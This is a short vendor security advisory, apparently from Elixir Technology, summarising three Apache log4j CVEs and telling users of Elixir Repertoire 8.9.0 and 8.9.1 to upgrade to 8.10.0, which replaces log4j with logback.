This entry covers the three log4j vulnerabilities with the CVE-ID of CVE-2021-44228, CVE-2021-45046 & CVE-2021-45105 respectively.
Reference Links:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
Description:
[CVE-2021-44228, log4j] - A Zero-day exploit
JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
[CVE-2021-45046, log4j]
The fix to address CVE-2021-44228 was incomplete in certain non-default configurations which could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Patter layout with either a Context Lookup or a Thread Context Map pattern resulting in a Denial of Service (DoS).
[CVE-2021-45105, log4j]
Apache log4j2 versions 2.0-alpha1 through 2.16.0 (excl. 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted.
Affected log4j versions:
- All Apache log4j versions from 2.0-beta9 to 2.16.0
>= 2.0-beta9 <= 2.16.0
Resolution:
- Upgrade to Elixir Repertoire v8.10.0 which replaces log4j with logback and JDK compatibility.
| Affected Version | → | Upgrade Version |
|---|---|---|
| Elixir Repertoire 8.9.0 | → | Elixir Repertoire 8.10.0 |
| Elixir Repertoire 8.9.1 | → | Elixir Repertoire 8.10.0 |
Do contact sales@elixirtech.com if your project is using the affected versions to download the updated product builds to address the above exploits and vulnerability.